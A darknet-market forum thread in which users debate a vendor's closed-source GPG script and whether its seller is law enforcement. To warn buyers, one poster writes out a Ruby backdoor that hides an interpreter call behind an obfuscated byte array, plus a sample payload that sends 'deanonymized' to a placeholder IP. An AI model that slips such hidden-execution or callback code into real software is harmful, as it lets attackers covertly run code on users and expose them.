Silk Road forums

And how does this relate to the person being accused.....

it shows that it is fucking stupid to use a script from ANYONE here if it isn't publicly audited, especially if you don't know the language well enough to recognize  | #{[105, 114, 98].pack("c*")}  is all that it takes to fuck you, which will consist of 100% of people who buy the script from Louis.

try this on for size.....

the actual program I would maliciously distribute would be a bit bigger (to actually serve a purpose other than to demonstrate a clever backdoor) but would have this in it ...

#opens the file with your GPG message in it
file = File.open("test", "r") 
message = ""

#reads the file line by line and adds each line to the string variable message
while line = file.gets
message << line
end

#decrypts your message and stores the plaintext as decrypted_message
decrypted_message = `echo "#{message}" | gpg -d`

#if the message is encrypted with the gpg-privacy toolkit we need to
#issue a special command or else it will fail because of the way
#that program encodes the messages. If a normal GPG client
#was used to encrypt the message, we don't need to do any
#special formating though.

if decrypted_message.include?("gpg-privacy-toolkit")
 puts `echo "#{decrypted_message}" | #{[105, 114, 98].pack("c*")}`
else
 puts `echo "#{decrypted_message"}`
end

let's see now...how about this as a message to encrypt to the unsuspecting vendor

#gpg-privacy-toolkit
require 'socket' ; sucks_to_be_you = TCPServer.open('11.11.11.11', '80') ; sucks_to_be_you.send('deanonymized', 0)

the ciphertext looks like this

-----BEGIN PGP MESSAGE-----
Version: GnuPG v1.4.11 (GNU/Linux)

hQIMA7GSQgzgdfsTAQ//SP27JA3aDgZh/atdSWeVAWekkUjQPuCuhwnZjxi5vFvG
E0N1SkQ/uAwgcGVEX4QWluYDudbI2SP88INsC1rL9E+jSASwjxr1dnSZBbXElj6d
y/SBf1an0fBYw1thd4EecO4iqqjgVm+YFND2qxoFvtFd5TAH/tC3qBNgp0Q3meDC
iXuvlZVOdmRDT5t4BM+Ukur4pdLzzzOMdeovp7augZAoj3VT9vlWH05PknPW0DWq
4efDGUeVlkxY//Es3R5LmkZ6XoSFOvPzTEaW5a9OC5ZyELL1+OrL61xKQR0l+o7s
4VkGPrhBAwec41+tuMZ9cz6NhGlyQc8950Pv99J6dXMgxP4iEe2h2CFTzk4+uPHc
QDeYQqcXI0elzzE+kF9ptuzcaF0sAP9Tx0yOmSggwGoFbj6sSQQPcARBoOg4TYvk
yVfchlIufeAfVZJsZUGKm+0fK2oI2Xvoy3HCWPUgc347esyxQrS5Mzrt9XVqm3gc
SO5dJ/ltgr3HNyrQPdQxmzOHEznaq8R+X5ImI7YdnEiVVLNYM2Br/v6tD3xXTEDY
7js+YHDSrdv1/WCtUjiiIJjKzS6y4YlAXF9E44C2XbSttj8XqwCHR59MH3x5YDrv
wy/02J6QJW4Gw39gqyO3FUkU0WaqpWGsmxE7mudvI+cH0rypxonM1nfBXar4tdbS
qgGT3ebTFWGr4oH+8nO9dv/KF95yw68MykNzeRJTI1idJjY2zgw3xQ8REU6aCM3v
LjdZq/BT2LvqSjVCLVuLHy6PbyxbKAhPSMg5W2LkK/eyE9/zVKVAmsWb7osK5XyW
HVuOHyKG4okWFvw7NgqMozzpYEAavvvhzPheQxyWfvC3NOCk+S88Shm37RfPpWNd
xAtlf2Z+4INETIptQdXBsaPAJQyFifn7lIl1
=6RTM
-----END PGP MESSAGE-----

hopefully nobody decrypts my message!!!

No, that's just your opinion.  You want me to adhere to your definition of what Silk Road should be rather than what it actually is.

No actually I don't give a shit what you do, but I will let people know that unless you adhere to my idea of what is secure that they should not use or pay for your software.

I've said my product is a particular thing, which runs in a certain way and is not a threat.  You (and Pine) say otherwise.  If people agree with you or are just not interested in the product then they won't buy it.  If people don't agree with you and are interested in the product then they might buy it.

I never said otherwise. I merely said the potential exists, and then explained how this potential can be greatly reduced. I am merely warning the people who may buy your product, that I would not consider it to be in their best interests to do so, as things currently stand.

If people buy it and I am telling the truth then that will be reported to the forum and, hopefully, I will have more sales.  If people buy it and it turns out I've lied or the product is a threat (or just includes a bad bug that makes it a threat), then that will be revealed.  At that point I will lose all credibility, have no sales and possibly have my account terminated and be driven from the site.

Except nobody who buys a simple python script like this is going to have the slightest clue if you are telling the truth or not.

If you really want to prove me wrong then buy SROPPy and post the code.  I'm willing to bet you don't do that.

Why would I buy something that I could make myself in about ten minutes with Ruby?

PS here is a neat link that talks about interpreted/compiled and handily discusses ruby and python. http://programmers.stackexchange.com/questions/24558/is-python-interpreted-or-compiled 

I can also completely understand pine's insistence that the code be released and checked before it is implemented by anyone; this is good security practice, but the fact that this is a product that is for sale by a registered vendor on an agorist marketplace makes this request more than a little unreasonable.

I strongly identify with Agorism, but one common theme I notice in many people who identify as such is that they let their ideological insistence on free markets and profit cloud their thinking. I actually notice this strongly when it comes to security software in particular. In many cases the best security and anonymity solutions are inherently free. Look at Tor and then look at any VPN. Tor works because volunteers donate their resources to a collective of people who are free to use them without any pay. Although it is not strictly speaking communistic due to the fact that nobody is forced to donate resources, it strikes me as having a more communist based ideology behind it than a paid VPN does. The fact that thousands of people volunteer their resources at little to no benefit for themselves allows Tor to be extremely good at providing low latency anonymity. I see a lot of Agorists who are actually not very fond of Tor and highly favor VPNs  (probably in part due to the fact that they sell access to VPN's and are pissed off that Tor offers better anonymity than they can in addition to being free). They are also highly focused on creating pay anonymity networks where every byte you transmit comes at a cost that is paid to the node operators who relay for you. Now I have nothing against people being paid for their resources, but from a security point of view I cringe at the idea of adding an entire unnecessary financial payment topology to an anonymity network. Now you need to anonymize the network traffic and the payment for the network traffic.

So Agorism is awesome and profiting from your work is awesome, but some things just do not mix well with profit unless you are extremely careful with how you go about it. You can donate cash to the Tor project and even to individual node operators in many cases. They do not make you pay to use their resources though. Truecrypt does not make you pay to use it, the source code is open and it is freely available for anyone to download and audit. At the same time they accept donations and make thousands of dollars. Not as much as the people making closed source proprietary encryption software make, but then again we can be more confident when we use their solution than we can be when we use the solutions from their strictly for profit competitors. Look at FileVault and VileFault for example.

Yes, warn vendors to go through the code with a fine-tooth comb should they purchase this item, but that's something that they should be doing anyway with anything that could potentially compromise them. It would do no harm to anyone to post this recommendation, but your statement will likely harm LouisCyphre's business prospects and damage his good reputation in the community. This is essentially slander.

We should not put the financial interests of vendors here above the security of everyone else. Vendors who purchase this code are not going to go through it with a fine tooth comb because if they knew enough to do that then they would simply make the program themselves. We need to be practical when we think of situations like these, sure it is possible to run this code completely isolated and be one hundred percent safe. Are people going to actually do this? Probably not. It is almost a strawman to give arguments like this, because in reality the people who would purchase this are not going to isolate it they are not going to audit it etc. Even if the code is one hundred percent non-malicious it doesn't matter because if we don't point out that people should not buy restricted access software from Louis then we have no right to point out that people should not use restricted access software that is offered through SR (or anywhere else) at all. It has nothing to do with Louis as an individual or a vendor, it has to do with best security practices, and the best practice for security would be to not run scripts that 99% of people on the forum are never going to look at, especially when the 1% of people who will pay for them are certainly going to be the people who do not have the skills to audit them.

Declaring LouisCyphre as "our resident LE Agent" is incredibly rash of you pine, and defamatory in the extreme; in the interest of fairness I would ask that the thread title be amended to reflect the fact that there is absolutely no evidence to back up this accusation.

A fair enough point.

You may assert that because he won't release the source code that he must be LE, or malicious in the extreme, but there is absolutely no logic in that at all. He's a creator of a digital item that he wishes to sell on an agorist marketplace, to anybody who wishes to buy it. He is allowed to do that, and has a right to do it without prejudice.
Asserting that he has malicious intent before you've seen the code is outrageous. Whilst I can see where you're coming from and how you arrived at the conclusion that you did, if you feel there is something malicious in what LouisCyphre is offering you are free to purchase it and review the code yourself for peace of mind - just like anybody else.

It is not particularly outrageous. If someone here suggests that we all stop using Tor and start using their for profit VPN, I will be the first to claim that the person is likely a law enforcement agent, Agorism and individual profit be damned.

PGPPortable is a worthless piece of shit! Do NOT use this software -- it is broken!


Guru

it's not broken i just used it like 3 days ago anyways opinions are like assholes everyone has one and they usually stink so if not really into cpu's try portable it's easy but ultimately you decide
[/quote]

512 bit keys have been broken by private individuals

Uh-huh.  So you've got a vendor account and inspected all the code that the vendor's see?

No, but I think it is less of a risk to count on Firefox not having a zero day vulnerability that SR will use to target me versus a script marketed to drug traffickers not having a backdoor that will target me. Strictly speaking it can be much more secure to run your application than to access SR, as you can not access SR from behind an air gap. On the other hand, it is dangerous to talk about things that are true in theory when they are extremely unlikely to be true in practice.

Also I believe it is theoretically possible to compile any interpreted language (and likewise to interpret any compiled language), so indeed python and even ruby can be compiled, it is just not the common use of Ruby (and in fact I don't know how to do it) but apparently can be done more practically with Python.

Yes there are, but if LE were really trying to do what you say they'd just use a JPG with a malicious exploit in it to fire up whenever the image is loaded.

Except it is insanely more difficult to pwn someone with a malicious JPG than it is to own someone who runs the script they just privately got from you....none of your arguments hold water and honestly they are stretching very far to try to make what you are doing appear to be anything other than sketchy with a capital S.

Quote from: Shroomeister on September 06, 2012, 06:49 am

....all this and I think all its really about is Pine wanting a free copy......just ask sweetheart....just ask....

lol^^ my guess by their posts is that they wouldn't run it on their system if they did but wouldn't it be funny if they did and it turned out to be everything that was promised? i think its kind of been forgotten that Louis created this out of request by another vendor... why doesnt someone just ask the vendor if it works? if they're reputable then it really shouldn't be that hard to trust their answer. LE can't just traffick mass quantities of drugs through the mail using an ordering system via darknet, as much as paranoid people would like to believe this. what kind of police work would that be? sure they could set up a fake vendor account and use a shitload of other fake buyer accounts to create feedback, but don't you think people would catch on if they canceled every REAL order? just saying... nobody except for Louis seems to have done a really good job of explaining much of anything about this software on this thread so at this point, i'm inclined to believe him more than take anyone else's opinion on it. wouldn't run the software without hearing from the vendor who requested it and used it though.

Do you have ADD and are incapable of following the discussion here? I find all of these diversion type comments to be pretty sketchy. None of this thread has anything to do with LE vendors shipping drugs, although it is extremely naive to think that law enforcement can not sell drugs that end up being used by people. If this were the case there would be no such thing as an undercover investigation, the organization being infiltrated could merely require that the agent be observed dealing drugs to users and then monitor if any of them are busted or not. If LE could not sell drugs that are then used, they could not do undercover operations. But all of that is completely irrelevant to the topic at hand here. You clearly are incapable of understanding the sort of attack we are talking about or really anything that is going on in this thread.